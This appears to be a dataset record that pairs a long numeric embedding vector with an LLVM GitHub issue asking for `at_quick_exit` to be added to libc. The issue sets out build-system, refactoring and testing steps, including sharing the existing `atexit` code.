-0.01827363856136799, 0.010946383699774742, 0.016271250322461128, 0.02591237612068653, 0.01194016169756651, -0.009388972073793411, 0.00021553474653046578, 0.0002883067063521594, -0.008736342191696167, 0.004201305098831654, 0.02008320391178131, -0.016612399369478226, 0.001601909869350493, -0.006707997526973486, 0.01867411658167839, 0.006385390646755695, -0.0023120157420635223, -0.015247808769345284, 0.0008853147737681866, 0.004331089556217194, -0.013623650185763836, -0.012852360494434834, 0.029946815222501755, -0.004942930303514004, -0.001105021103285253, 0.01377197541296482, 0.0038712820969522, 0.00010145197302335873, -0.010909303091466427, 0.0019171005114912987, 0.014172452501952648, -0.006704289466142654, -0.0052024987526237965, -0.010063850320875645, 0.024755440652370453, 0.000003936261236958671, 0.0001983846741495654, 0.0018967058276757598, -0.005984913092106581, 0.021863102912902832, 0.0018967058276757598, -0.011814084835350513, -0.01948990300297737, 0.004497955087572336, -0.02442912571132183, -0.007757396902889013, 0.006062783766537905, 0.0006832219660282135, -0.010612652637064457, 0.0005325794336386025, -0.011784420348703861, 0.0016751453513279557, 0.004175348207354546, -0.006637543439865112, 0.00438300333917141, 0.007523784879595041, -0.00369885447435081, 0.017027707770466805, 0.003726665396243334, -0.025600893422961235, 0.0029850404243916273, -0.005614100955426693, -0.01449876744300127, 0.006689456757158041, 0.013200923800468445, -0.0009956314461305737, -0.01867411658167839, -0.018140146508812904, 0.02213008888065815, 0.019801385700702667, -0.012971020303666592, -0.004319965373724699, -0.015218143351376057, -0.021062148734927177, 0.00009449924255022779, 0.0013701521093025804, -0.026238691061735153, 0.014105706475675106, 0.007316130213439465, -0.03126690909266472, -0.00046536963782273233, 0.00334658264182508, -0.009700453840196133, -0.00036316446494311094, 0.0007101058727130294, 0.005213623400777578, 0.029798490926623344, 0.014624843373894691, -0.009196149185299873, 0.010909303091466427, 0.007590531371533871, 0.007735148072242737, 0.00771289924159646, -0.013393746688961983, -0.019000431522727013, 0.008951413445174694, 0.0034077665768563747, -0.0034615343902260065, -0.0009251771261915565, -0.028226245194673538, -0.01063490193337202, 0.016998043283820152, 0.002490005688741803, 0.030243465676903725, 0.004364462569355965, 0.007994716987013817, -0.004646280314773321, 0.0138313053175807, -0.0038861145731061697, 0.01024925708770752, -0.011027962900698185, 0.02279755100607872, 0.011999491602182388, 0.0188224408775568, 0.026757827028632164, -0.032661162316799164, 0.015106899663805962, 0.023998983204364777, 0.0054694837890565395, 0.0030369542073458433, -0.003090722020715475, 0.004724150989204645, 0.011317196302115917, 0.00876600667834282, 0.001117999549023807, 0.013705228455364704, 0.002593833254650235, 0.014847331680357456, -0.044319506734609604, -0.03639895096421242, 0.010390165261924267, -0.01837746612727642, -0.008165290579199791, -0.004345922265201807, 0.015841107815504074, -0.020216695964336395, 0.022515732795000076, -0.002523378934711218, -0.00002750675230345223, 0.014424605295062065, -0.0012987706577405334, -0.021625783294439316, 0.000999339623376727, -0.006837781984359026, 0.016642063856124878, -0.007449622731655836, 0.0070046475157141685, 0.00021147898223716766, -0.03349178284406662, 0.005877377465367317, 0.003111116588115692, 0.013868385925889015, -0.018985599279403687, 0.005165417678654194, -0.0039046553429216146, -0.01059782039374113, -0.006722830235958099, -0.005973788909614086, 0.018881771713495255, -0.001353465486317873, -0.011702841147780418, 0.00023720410536043346, 0.004598074592649937, 0.007401417009532452, 0.014802834019064903, 0.020023873075842857, 0.008054046891629696, 0.03678459674119949, -0.0006313082412816584, 0.014543265104293823, -0.011124374344944954, -0.019475070759654045, -0.025556394830346107, 0.014380107633769512, -0.00781672727316618, -0.00043315530638210475, 0.01797698810696602, -0.008372945711016655, 0.021225305274128914, -0.00595154007896781, 0.0034874912817031145, 0.006600461900234222, 0.016834886744618416, -0.016256418079137802, -0.005673430860042572, 0.0035153022035956383, -0.010709064081311226, 0.0036191297695040703, 0.026342518627643585, 0.0035727780777961016, 0.0027662611100822687, -0.011569349095225334, 0.009055240079760551, 0.028834378346800804, -0.007464454974979162, -0.0006892476812936366, 0.006225941237062216, 0.022782718762755394, 0.008113376796245575, -0.011888247914612293, -0.005069006234407425, 0.016760723665356636, 0.02232290990650654, -0.005810631439089775, -0.01775450073182583, -0.01901526376605034, 0.013556904159486294, -0.021225305274128914, 0.027840599417686462, -0.005061590112745762, 0.008372945711016655, 0.011383943259716034, 0.0015147689264267683, -0.007794477976858616, 0.003326187841594219, 0.019030096009373665, -0.011821501888334751, -0.003760038409382105, -0.016033930703997612, -0.007668402045965195, -0.004338505677878857, -0.007757396902889013, 0.021284636110067368, 0.017517181113362312, -0.00008812590385787189, -0.0004927170812152326, 0.0037359355483204126, 0.0028775047976523638, 0.011280115693807602, -0.03806019201874733, -0.0030295378528535366, 0.0018716759514063597, -0.0017938052769750357, -0.02220425009727478, 0.0014610011130571365, 0.0002635086129885167, 0.03435206785798073, -0.009574377909302711, -0.02309420146048069, -0.007445914205163717, -0.013215756043791771, 0.004950346425175667, -0.0030499326530843973, 0.007175221107900143, -0.02410281077027321, -0.001333997817710042, -0.017279861494898796, -0.01971239037811756, -0.006007161922752857, -0.0014480226673185825, 0.007571990601718426, 0.0009909963700920343, -0.022441571578383446, 0.014728670939803123, 0.02232290990650654, 0.006018286570906639, -0.002204480115324259, -0.0001771788374753669, -0.005050465930253267, 0.007638737093657255, -0.01164351124316454, -0.014580346643924713, 0.009611459448933601, -0.016256418079137802, 0.01573728211224079, 0.008832752704620361, 0.020617173984646797, -0.007523784879595041, -0.008639930747449398, 0.0034096206072717905, -0.005028217099606991, 0.01830330304801464, -0.0022601019591093063, 0.013497574254870415, -0.023554008454084396, 0.003203819738700986, 0.008973661810159683, -0.002554897917434573, -0.0031426355708390474, -0.014446853660047054, 0.025675054639577866, 0.003470804775133729, -0.03447072580456734, -0.008869834244251251, 0.005732760764658451, -0.015826275572180748, 0.01938607543706894, -0.012518629431724548, 0.0021692528389394283, -0.0001396340667270124, -0.0003543576749507338, -0.004668529145419598, 0.01771000400185585, -0.01911909133195877, -0.014165036380290985, -0.006088740658015013, 0.007927970960736275, 0.0038267846684902906, 0.006470677442848682, 0.003442993853241205, -0.007668402045965195, -0.003596880938857794, -0.016716226935386658, 0.015870774164795876, -0.014402355998754501, -0.052892692387104034, 0.005877377465367317, 0.014802834019064903, -0.001829959568567574, 0.011480353772640228, -0.0026642875745892525, -0.0027143473271280527, -0.01162126287817955, -0.0090255755931139, 0.008714092895388603, 0.003061056835576892, 0.006114697549492121, 0.003530134679749608, 0.021744443103671074, 0.012170065194368362, -0.021299468353390694, 0.00009142844646703452, 0.006036826875060797, 0.0042383866384625435, 0.0057475934736430645, 0.005844004452228546, -0.002797780092805624, 0.009396388195455074, 0.006025702692568302, -0.000460734503576532, -0.004898432642221451, 0.03553866595029831, -0.02632768452167511, 0.012852360494434834, 0.0072382595390081406, 0.007482995744794607, -0.00742737390100956, 0.0024937137495726347, -0.020483680069446564, -0.022337744012475014, 0.0029516671784222126, -0.035627663135528564, 0.0028089045081287622, -0.010961216874420643, 0.008632514625787735, -0.024785105139017105, 0.0037303734570741653, 0.00018969376105815172, -0.012036573141813278, 0.012281308881938457, 0.007801894564181566, 0.014231782406568527, 0.016256418079137802, 0.0054101538844406605, -0.03233484551310539, -0.020765498280525208, 0.017576511949300766, -0.0106942318379879, -0.03346211835741997, 0.010479160584509373, 0.007089934311807156, 0.0014934472274035215, -0.016478905454277992, -0.027914762496948242, 0.0003209845453966409, -0.031237242743372917, -0.0008658471051603556, 0.018258806318044662, 0.008328448049724102, 0.006455845199525356, -0.0247257761657238, 0.011450689285993576, -0.014417189173400402, 0.020809995010495186, 0.018688948825001717, -0.004449749831110239, -0.0016640209360048175, -0.01158418133854866, 0.02213008888065815, 0.0015518502332270145, -0.004156807903200388, -0.004494247026741505, -0.04458649083971977, -0.0006568015669472516, 0.026194192469120026, -0.007216010708361864, -0.010301170870661736, 0.01520331110805273, 0.007920553907752037, -0.00579209066927433, 0.006196276284754276, 0.007809310685843229, -0.015381300821900368, -0.0011485916329547763, -0.010264089331030846, -0.013415995053946972, -0.009611459448933601, 0.0037414978723973036, 0.01946023851633072, 0.012926522642374039, 0.005046757869422436, -0.001242221798747778, -0.002399156568571925, 0.013104512356221676, 0.017472684383392334, 0.00021924286556895822, 0.008595433086156845, -0.002243415452539921, -0.0030351001769304276, -0.012889441102743149, -0.01306743174791336, 0.0420353002846241, -0.006326060742139816, -0.0033577068243175745, 0.007638737093657255, 0.021521955728530884, -0.0108796376734972, -0.009092321619391441, -0.006652375683188438, -0.003124095033854246, -0.010390165261924267, 0.025897542014718056, 0.014469102956354618, -0.009655957110226154, -0.01202915608882904, -0.003240901045501232, 0.005232164170593023, 0.013045182451605797, -0.0213884636759758, 0.002922002226114273, -0.009299976751208305, -0.010738729499280453, 0.03426307067275047, -0.00012086168862879276, -0.007764813024550676, -0.02146262489259243, -0.013037766329944134, 0.00900332722812891, -0.013631066307425499, 0.006021994631737471, 0.0024214053992182016, 0.01190308015793562, 0.007471871096640825, 0.018955932930111885, -0.0018123459303751588, -0.007060269359499216, 0.0008672376861795783, 0.0005126482574269176, 0.003203819738700986, -0.014713838696479797, -0.02094348892569542, 0.012370304204523563, 0.013616234064102173, -0.0019467654637992382, -0.019030096009373665, 0.003480074927210808, -0.012837527319788933, 0.008313615806400776, 0.0009182243957184255, -0.01563345454633236, -0.005291494075208902, 0.0184516292065382, -0.004909557290375233, 0.033699437975883484, -0.0072642164304852486, -0.023643003776669502, 0.009611459448933601, 0.0026253522373735905, -0.0016121072694659233, -0.001739110448397696, -0.024814769625663757, -0.009159067645668983, -0.01600426621735096, 0.022085590288043022, 0.014024127274751663, 0.011317196302115917, -0.02035018801689148, 0.012281308881938457, 0.03583531826734543, -0.01911909133195877, -0.004331089556217194, -0.009796865284442902, -0.001026223530061543, 0.005020800977945328, -0.007375460118055344, -0.00111151032615453, 0.012592791579663754, -0.001051253406330943, 0.005235872231423855, 0.011495186947286129, -0.007538617588579655, 0.0009372284985147417, 0.021329132840037346, 0.03702191635966301, -0.017650673165917397, 0.0019041220657527447, 0.0006860030698589981, 0.01618225686252117, -0.011777004227042198, -0.01730952598154545, 0.01479541789740324, -0.006548548117280006, -0.011228201910853386, 0.004205013625323772, 0.001804002677090466, 0.02146262489259243, 0.00010568155266810209, 0.008958829566836357, 0.003993650432676077, -0.007015771698206663, -0.0026438930071890354, 0.006088740658015013, 0.015588955953717232, 0.008091128431260586, -0.0067117055878043175, -0.005536230280995369, 0.021892767399549484, -0.014387523755431175, -0.027781270444393158, 0.010086099617183208, -0.016345413401722908, 0.009522464126348495, -0.0033354582265019417, -0.01498082373291254, -0.006377974525094032, -0.018243974074721336, 0.0016853426350280643, 0.013705228455364704, 0.014454269781708717, 0.0039788177236914635, -0.0037229571025818586, -0.013334416784346104, -0.007431081961840391, -0.004319965373724699, 0.02045401558279991, -0.013809056021273136, -0.023717164993286133, 0.0035412590950727463, 0.01785832829773426, -0.00438300333917141, -0.00023801525821909308, -0.0019912628922611475, -0.003635816276073456, 0.024636780843138695, -0.01595976948738098, -0.015692783519625664, -0.015989433974027634, -0.0043941279873251915, -0.007853807881474495, -0.0054694837890565395, 0.008691844530403614, -0.013156426139175892, 0.006670916453003883, 0.030020978301763535, -0.004809437785297632, 0.01165834441781044, 0.02390998788177967, 0.003982525784522295, 0.007423665840178728, 0.028878875076770782, 0.004360754508525133, 0.006444720551371574, 0.015944935381412506, 0.004475706722587347, 0.001889289589598775, -0.0027403042186051607, -0.0037229571025818586, -0.008417443372309208, -0.014187284745275974, -0.0007963198004290462, 0.006923068780452013, 0.005743884947150946, -0.005284077487885952, -0.000013195709470892325, -0.0026234982069581747, -0.002831153105944395, -0.009381555020809174, 0.011339445598423481, 0.004546160809695721, -0.006055367644876242, -0.034441061317920685, -0.017798999324440956, -0.015396133996546268, -0.014706422574818134, 0.007972467690706253, -0.01897076517343521, -0.0026902444660663605, 0.0007036166498437524, -0.016909047961235046, -0.01857028901576996, 0.003930612001568079, -0.022471236065030098, 0.004968887194991112, -0.00409376947209239, -0.006407639477401972, 0.00150364451110363, -0.012043989263474941, -0.011599014513194561, -0.00021275365725159645, -0.015915270894765854, -0.00037614291068166494, -0.0022341450676321983, 0.00022735439415555447, 0.002949813148006797, 0.0026105197612196207, 0.01748751662671566, 0.00688598770648241, -0.004601782653480768, -0.01926741562783718, 0.014528432860970497, -0.0010290045756846666, 0.016167422756552696, -0.0035375510342419147, -0.014832498505711555, -0.007653569336980581, 0.011487769894301891, -0.007097350899130106, -0.011109541170299053, 0.0013692250940948725, 0.0005571457440964878, 0.0042198458686470985, 0.0041345590725541115, 0.014654508791863918, -0.004449749831110239, -0.012058821506798267, -0.005473191849887371, -0.012006907723844051, 0.0013006246881559491, -0.015366468578577042, 0.022812383249402046, -0.03426307067275047, 0.017443018034100533, 0.009181316941976547, 0.03277982398867607, 0.0010985319968312979, 0.011710258200764656, 0.0213884636759758, 0.014320777729153633, 0.010842557065188885, 0.0029294185806065798, -0.006233357824385166, 0.009292560629546642, -0.0028923372738063335, 0.003874990390613675, -0.0243252981454134, 0.008855002000927925, -0.00569938775151968, 0.016849718987941742, -0.005840296391397715, 0.0033224797807633877, -0.004119726363569498, 0.0027050769422203302, 0.005584436003118753, 0.019727222621440887, 0.001450803829357028, 0.0006887841736897826, -0.015915270894765854, -0.013267669826745987, -0.013898051343858242, 0.003845325205475092, -0.0016658749664202332, 0.0036302541848272085, -0.001379422377794981, 0.007282756734639406, 0.004312549252063036, -0.007449622731655836, 0.0039046553429216146, -0.025304242968559265, 0.01446168590337038, 0.012785613536834717, 0.003845325205475092, -0.010108347982168198, 0.005628933198750019, -0.011450689285993576, 0.004275467712432146, 0.017873160541057587, 0.023123865947127342, 0.004060396458953619, 0.012518629431724548, -0.005621517077088356, -0.001660312875173986, -0.0020357605535537004, -0.013104512356221676, -0.004954054486006498, 0.0025066921953111887, 0.028908539563417435, -0.020913822576403618, -0.016033930703997612, 0.018466461449861526, 0.021284636110067368, 0.011458105407655239, 0.011858582496643066, 0.0018577704904600978, 0.01570761576294899, 0.030436286702752113, 0.014506183564662933, 0.012155232951045036, 0.009655957110226154, -0.010160261765122414, 0.010204759426414967, 0.0010966778500005603, -0.013282503001391888, -0.0025530438870191574, 0.006871154997497797, -0.0036117134150117636, -0.00844710785895586, -0.04915490001440048, -0.027618112042546272, 0.01960856281220913, -0.0014368983684107661, 0.019430574029684067, -0.013690396212041378, -0.009351890534162521, -0.013601401820778847, -0.010983465239405632, 0.010197343304753304, 0.00505788205191493, -0.015870774164795876, -0.006678332574665546, 0.0023639295250177383, -0.01618225686252117, 0.0069267768412828445, 0.01595976948738098, -0.026298020035028458, 0.006967566441744566, 0.02457745000720024, 0.0127336997538805, -0.02417697384953499, 0.012273892760276794, 0.024888932704925537, -0.008432275615632534, -0.007223426830023527, 0.009529880248010159, -0.0068414900451898575, 0.023479845374822617, -0.007586823310703039, 0.01652340404689312, 0.002988748485222459, -0.003240901045501232, 0.020884158089756966, -0.0056437659077346325, 0.013949965126812458, -0.005272953305393457, 0.001765994355082512, 0.0056103928945958614, 0.000870018731802702, -0.002962791593745351, 0.024740608409047127, -0.017383689060807228, -0.0055399383418262005, 0.0013173113111406565, 0.02331668883562088, 0.003949152771383524, 0.03191953897476196, -0.012488964013755322, 0.007735148072242737, -0.01232580654323101, -0.011732506565749645, -0.010686815716326237, -0.008536103181540966, 0.007660985458642244, 0.015618621371686459, 0.014995655976235867, -0.0125482939183712, 0.0020301982294768095, 0.02094348892569542, 0.00011848616850329563, -0.015752114355564117, 0.02442912571132183, 0.0001726595510262996, 0.012014323845505714, 0.014469102956354618, 0.023672668263316154, 0.006400223355740309, 0.02933868207037449, -0.007646153215318918, 0.014528432860970497, -0.015974601730704308, 0.017220530658960342, -0.008313615806400776, -0.0037693087942898273, -0.0022971832659095526, -0.0019931169226765633, -0.016137758269906044, 0.01659756526350975, 0.0020172197837382555, -0.022678891196846962, 0.003079597605392337, 0.008358113467693329, -0.016330581158399582, 0.011406191624701023, -0.017220530658960342, 0.0007045436650514603, -0.010582988150417805, 0.007071394007652998, -0.044764481484889984, -0.0040381476283073425, -0.005736468825489283, 0.0037433519028127193, -0.007141848094761372, -0.001038274960592389, 0.020290859043598175, -0.0035245725885033607, 0.019697558134794235, 0.003737789811566472, 0.01719086617231369, -0.015752114355564117, -0.005298910196870565, -0.009922942146658897, -0.01753201335668564, -0.015054985880851746, 0.01600426621735096, 0.011999491602182388, -0.0015898584388196468, 0.0006243555108085275, -0.017220530658960342, 0.0009223960223607719, -0.013838721439242363, -0.011005714535713196, 0.007375460118055344, 0.013898051343858242, 0.01338633056730032, 0.004334797617048025, -0.00103271275293082, -0.007950219325721264, -0.030124805867671967, 0.002289766911417246, -0.0054398188367486, -0.008469357155263424, 0.015588955953717232, -0.007253091782331467, -0.0014619281282648444, -0.01730952598154545, -0.004553576931357384, 0.00896624568849802, -0.016360245645046234, 0.007757396902889013, 0.014113122597336769, 0.0012802300043404102, 0.014810250140726566, -0.0291161946952343, -0.01277078129351139, 0.011168872006237507, 0.013134177774190903, -0.007319838274270296, -0.010464328341186047, 0.0017493078485131264, -0.004876183811575174, 0.0106942318379879, -0.004972595255821943, 0.008899499662220478, 0.011435856111347675, -0.028419068083167076, 0.015514793805778027, -0.00042388500878587365, -0.013556904159486294, -0.02042435109615326, -0.00898849405348301, -0.005903334356844425, 0.007868641056120396, 0.00993035826832056, 0.010938967578113079, 0.01971239037811756, 0.00993035826832056, 0.00800213310867548, 0.0022656642831861973, -0.01975688897073269, 0.01723536290228367, -0.0010243694996461272, -0.001268178690224886, 0.006600461900234222, -0.0017233509570360184, 0.00426063546910882, -0.005450943484902382, 0.021447792649269104, 0.002923856256529689, -0.014884412288665771, -0.012073653750121593, 0.0005200644955039024, -0.008654762990772724, -0.00726792449131608, -0.008758590556681156, 0.019890381023287773, -0.0020413226447999477, 0.015010489150881767, 0.001274667913094163, 0.00291458610445261, 0.004961471073329449, 0.0029590835329145193, -0.022827215492725372, -0.019208086654543877, -0.009581794030964375, 0.011688008904457092, 0.019653061404824257, 0.004256926942616701, -0.03346211835741997, -0.013008101843297482, -0.003695146180689335, -0.00874375831335783, -0.012310974299907684, -0.02052817866206169, -0.02279755100607872, -0.01375714223831892, 0.0031018462032079697, 0.01644924096763134, 0.013786807656288147, 0.008721509017050266, -0.0009210054995492101, -0.004041855689138174, -0.0031537599861621857, -0.009663373231887817, 0.006630126852542162, 0.017887992784380913, -0.013497574254870415, -0.009885860607028008, 0.011688008904457092, 0.0025734384544193745, 0.00017544065485708416, 0.010531074367463589, 0.004164224024862051, -0.016419576480984688, 0.018288470804691315, 0.006478094030171633, -0.02094348892569542, -0.0026828281115740538, -0.001771556562744081, 0.004616615362465382, -0.01165834441781044, 0.021625783294439316, -0.017443018034100533, -0.019653061404824257, 0.0369032584130764, -0.024740608409047127, -0.008246869780123234, -0.013935132883489132, -0.006047951523214579, 0.004308840725570917, 0.0010790643282234669, -0.01401671115309, 0.007601655554026365, -0.012147816829383373, -0.010679399594664574, -0.010827723890542984, -0.018555456772446632, 0.025200415402650833, -0.011065044440329075, 0.01753201335668564, -0.011836334131658077, 0.020098036155104637, 0.014350442215800285, 0.023820992559194565, -0.003305793274194002, -0.009277728386223316, -0.008165290579199791, 0.006600461900234222, -0.010086099617183208, 0.013742309994995594, -0.011747338809072971, -0.012296141125261784, -0.006974982563406229, -0.016612399369478226, 0.0005205280031077564, 0.017294693738222122, -0.02491859719157219, -0.002189647639170289, 0.02365783601999283, 0.022308077663183212, -0.003693292150273919, 0.0012366595910862088, 0.017428185790777206, -0.019430574029684067, 0.011094708926975727, -0.009618875570595264, -0.003012851346284151, -0.017428185790777206, 0.011747338809072971, 0.01427628006786108, -0.0065559642389416695, -0.0009474258404225111, 0.010316003113985062, -0.022441571578383446, -0.00678586820140481, 0.035331010818481445, -0.0026253522373735905, 0.01257054228335619, 0.008736342191696167, 0.008906915783882141, -0.005706803873181343, -0.012948771007359028, 0.012637289240956306, -0.022693723440170288, -0.0038601579144597054, -0.0015314555494114757, 0.021151144057512283, -0.0014851039741188288, 0.018392298370599747, 0.0158856064081192, -0.023554008454084396, 0.0070565612986683846, 0.0012857922120019794, 0.0036376703064888716, -0.006199984345585108, 0.0028775047976523638, -0.0038675740361213684, 0.018763110041618347, 0.006852614227682352, 0.0045832423493266106, 0.006162903271615505, -0.008647346869111061, -0.006511467043310404, -0.022026261314749718, 0.01062006875872612, 0.04259893670678139, 0.009307392872869968, 0.013720061630010605, 0.014157620258629322, -0.0013312167720869184, 0.0154851283878088, 0.0030573487747460604, 0.005710511934012175, -0.004049272276461124, 0.03126690909266472, 0.008232036605477333, 0.014135370962321758, -0.021418128162622452, 0.0154999615624547, -0.004879891872406006, -0.00160839909221977, 0.01184375025331974, -0.005666014738380909, 0.005758717656135559, 0.00364879472181201, -0.014914077706634998, -0.006348309572786093, -0.009307392872869968, 0.013334416784346104, 0.016389911994338036, -0.011613846756517887, -0.017873160541057587, -0.009114570915699005, 0.02561572566628456, 0.018110480159521103, 0.02316836267709732, 0.018125314265489578, -0.04470515251159668, -0.005224747583270073, 0.025704720988869667, -0.03242384269833565, -0.01607842929661274, -0.0010438370518386364, -0.0022452694829553366, -0.012926522642374039, 0.0015017904806882143, 0.013868385925889015, 0.024221470579504967, -0.021788939833641052, -0.004998552147299051, -0.023820992559194565, -0.009255479089915752, -0.018540622666478157, -0.00800213310867548, 0.0028997536282986403, -0.025571227073669434, 0.0015092067187651992, 0.012815278954803944, 0.0007638736860826612, -0.005554770585149527, 0.011599014513194561, -0.016315748915076256, 0.0008125427993945777, -0.0015119878808036447, -0.014024127274751663, -0.0021544203627854586, -0.0012700327206403017, 0.0127336997538805, -0.005992329679429531, -0.005350823979824781, -0.006237065885215998, 0.002738450188189745, 0.016063597053289413, -0.013238005340099335, -0.060427598655223846, 0.025867877528071404, 0.005395321641117334, 0.017606176435947418, -0.005083838943392038, 0.007442206144332886, 0.02558606117963791, -0.0012459298595786095, -0.04523912072181702, -0.009084905497729778, 0.005432402715086937, 0.009032991714775562, -0.033877428621053696, 0.005428694654256105, -0.02966499701142311, -0.03352144733071327, -0.020172199234366417, 0.010894469916820526, -0.01637507788836956, -0.01775450073182583, -0.014869580045342445, 0.007486703805625439, -0.024073146283626556, -0.0158856064081192, 0.011547100730240345, -0.016048762947320938, 0.031800877302885056, 0.007171513047069311, -0.0030425162985920906, 0.010590404272079468, -0.017027707770466805, -0.0042903004214167595, -0.009589210152626038, 0.007353211287409067, 0.010360500775277615, -0.009485382586717606, -0.023924820125102997, -0.02499276027083397, 0.029398012906312943, 0.006296395789831877, 0.02635735087096691, 0.009136819280683994, 0.016286084428429604, 0.016998043283820152, 0.004434917122125626, -0.0006892476812936366, -0.017176033928990364, -0.010671982541680336, -0.010419830679893494, 0.007501536048948765, -0.006596753839403391, -0.013037766329944134, -0.03633962199091911, 0.00031727642635814846, 0.021136309951543808, 0.022174585610628128, 0.0035412590950727463, 0.0020283441990613937, 0.018733445554971695, -0.0070825181901454926, 0.014506183564662933, 0.004857643507421017, 0.0039046553429216146, 0.0044534578919410706, 0.002438091905787587, 0.0038935309275984764, 0.008588016964495182, 0.024681277573108673, 0.016834886744618416, 0.02981332316994667, -0.015396133996546268, 0.014031543396413326, -0.004523911979049444, -0.0019857008010149, -0.0014331901911646128, -0.00874375831335783, 0.01644924096763134, -0.018036318942904472, 0.0015898584388196468, 0.009945190511643887, 0.013586568646132946, -0.005421278532594442, 0.000725401914678514, -0.005510273389518261, -0.008573184721171856, -0.00662641879171133, -0.007994716987013817, 0.011910496279597282, 0.01834780164062977, 0.006455845199525356, 0.0021414419170469046, -0.027113808318972588, 0.023850658908486366, -0.0023045993875712156, 0.04900657758116722, -0.0008338645566254854, 0.008565767668187618, 0.01033825147897005, -0.0173391904681921, -0.012192313559353352, 0.013853553682565689, 0.02425113506615162, -0.015292306430637836, 0.01593010313808918, -0.016686560586094856, 0.013111928477883339, 0.012540877796709538, 0.013616234064102173, -0.009114570915699005, 0.006066491827368736, 0.001666802098043263, -0.026713330298662186, -0.016345413401722908, 0.012370304204523563, 0.01011576410382986, -0.012399968691170216, -0.013104512356221676, -0.017517181113362312, 0.0028200289234519005, -0.0017734105931594968, -0.009403804317116737, 0.003001726930961013, 0.005895918235182762, -0.004794605076313019, 0.027766438201069832, 0.00592187512665987, -0.0007629466708749533, -0.010612652637064457, 0.010011936537921429, -0.0010076828766614199, -0.0024492163211107254, 0.02457745000720024, -0.013393746688961983, -0.009485382586717606, 0.01194016169756651, -0.014231782406568527, -0.012207146733999252, -0.00703802052885294, -0.0038712820969522, 0.031177911907434464, 0.017368856817483902, 0.01212556753307581, -0.0007165950955823064, 0.0195344015955925, -0.0026309145614504814, -0.004371879156678915, -0.02442912571132183, -0.011332029476761818, -0.0016584587283432484, 0.00008499716932419688, 0.012459298595786095, -0.011428439989686012, -0.019727222621440887, 0.009974854998290539, 0.005840296391397715, -0.009092321619391441, 0.0033818096853792667, 0.010835140012204647, -0.019949709996581078, 0.012933938764035702, -0.011346861720085144, -0.0001450803829357028, 0.012963604182004929, 0.026090364903211594, 0.019727222621440887, -0.0011458105873316526, 0.007494119927287102, 0.004078937228769064, 0.021225305274128914, -0.04188697785139084, 0.0006725611165165901, -0.019623395055532455, 0.013638482429087162, -0.016286084428429604, -0.006392806768417358, -0.005528813693672419, 0.0033502907026559114, -0.002295329235494137, -0.01095380075275898, 0.010382749140262604, -0.004249510820955038, -0.019252583384513855, -0.007987300865352154, -0.0009372284985147417, -0.0016964670503512025, -0.0009752368205226958, -0.006589337717741728, -0.008877250365912914, -0.0032316306605935097, -0.0247257761657238, -0.009626291692256927, 0.01785832829773426, -0.0002792681334540248, 0.00579209066927433, 0.0026624335441738367, -0.009626291692256927, -0.01859995350241661, -0.0026383306831121445, -0.001189381000585854, 0.012689203023910522, -0.0019467654637992382, -0.01325283758342266, -0.024369794875383377, 0.0005219185259193182, 0.02454778552055359, 0.0033743935637176037, -0.010531074367463589, 0.015307138673961163, 0.012652121484279633, 0.010286337696015835, 0.013519822619855404, 0.007026896346360445, 0.033729102462530136, -0.0006238920032046735, 0.0068748630583286285, -0.01753201335668564, 0.04393386095762253, -0.022144921123981476, -0.0006628272822126746, 0.01879277639091015, 0.014150204136967659, 0.0009177608881145716, 0.01745785027742386, 0.0025066921953111887, 0.010049018077552319, -0.013275086879730225, 0.017873160541057587, 0.016775555908679962, 0.017576511949300766, 0.008595433086156845, 0.011650927364826202, -0.004127142950892448, -0.0044015441089868546, 0.015974601730704308, -0.009233230724930763, 0.05004484951496124, 0.0067376624792814255, -0.003074035281315446, -0.002645747037604451, 0.011213368736207485, -0.011458105407655239, -0.0011736215092241764, -0.01667172834277153, -0.020439183339476585, 0.02339085005223751, 0.01095380075275898, 0.0023824700620025396, -0.0154851283878088, -0.0056437659077346325, 0.011235618032515049, -0.022975539788603783, 0.0021748151630163193, -0.02936834841966629, -0.011984659358859062, -0.010508825071156025, 0.028493229299783707, -0.0014925202121958137, 0.00007080200884956867, -0.013423411175608635, -0.012110735289752483, 0.014127954840660095, 0.010323419235646725, 0.02023152820765972, 0.0023453887552022934, 0.003099992172792554, -0.02754395082592964, -0.011984659358859062, -0.009611459448933601, 0.0037044165655970573, 0.015218143351376057, 0.013490157201886177, -0.014439437538385391, 0.015307138673961163, 0.010716480202972889, -0.000027173600756214, 0.03583531826734543, -0.004242094699293375, 0.015396133996546268, 0.013193507678806782, -0.020038705319166183, 0.006292687729001045, -0.008469357155263424, 0.0008927310118451715, -0.008736342191696167, 0.0005863471888005733, 0.006392806768417358, 0.005955248139798641, -0.020987985655665398, -0.013682980090379715, 0.0031815709080547094, -0.008625098504126072, 0.01578177884221077, 0.018911436200141907, -0.01578177884221077, 0.026238691061735153, -0.00175208889413625, 0.0033706852700561285, 0.0023565131705254316 ]
null
null
null
null
null
null
null
null
null
[ "llvm", "llvm-project" ]
Followup to #93581 The `at_quick_exit` function is defined in the C standard on page 381 of this PDF: https://www.open-std.org/jtc1/sc22/wg14/www/docs/n3220.pdf It's used to register callbacks to be run when `quick_exit` is called, so changes to `quick_exit` will be necessary. Additionally it's similar in design to [`atexit`](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/atexit.cpp) so refactoring to reuse that code is recommended. ### Build System In [entrypoints.txt](https://github.com/llvm/llvm-project/blob/main/libc/config/linux/x86_64/entrypoints.txt) - [ ] Add the new function to the list of entrypoints for stdlib.h (you need to do this before it will build) In [stdlib/CMakeLists.txt](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/CMakeLists.txt) - [ ] Add new entrypoint objects to the list In [stdc.td](https://github.com/llvm/llvm-project/blob/main/libc/spec/stdc.td) - [ ] Add the functions to the list of functions for stdlib.h. ### Code - [ ] Refactor [`atexit`](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/atexit.cpp) The existing implementation of `atexit` defines a system for storing and calling functions similar to what should be used for `at_quick_exit`, so it should be moved to a shared file. From there, both `atexit` and `at_quick_exit` should maintain separate lists of functions to call. - [ ] Create `stdlib/at_quick_exit.h` - [ ] Create `stdlib/at_quick_exit.cpp` ### Testing - [ ] Create `test/src/stdlib/at_quick_exit_test.cpp` - [ ] Add your test to [test/src/stdlib/CMakeLists.txt](https://github.com/llvm/llvm-project/blob/main/libc/test/src/stdlib/CMakeLists.txt)
[libc] add `at_quick_exit`
https://api.github.com/repos/llvm/llvm-project/issues/94060/comments
2
2024-05-31T22:18:24
2024-06-06T21:05:59Z
https://github.com/llvm/llvm-project/issues/94060
2,328,656,540
94,060
false
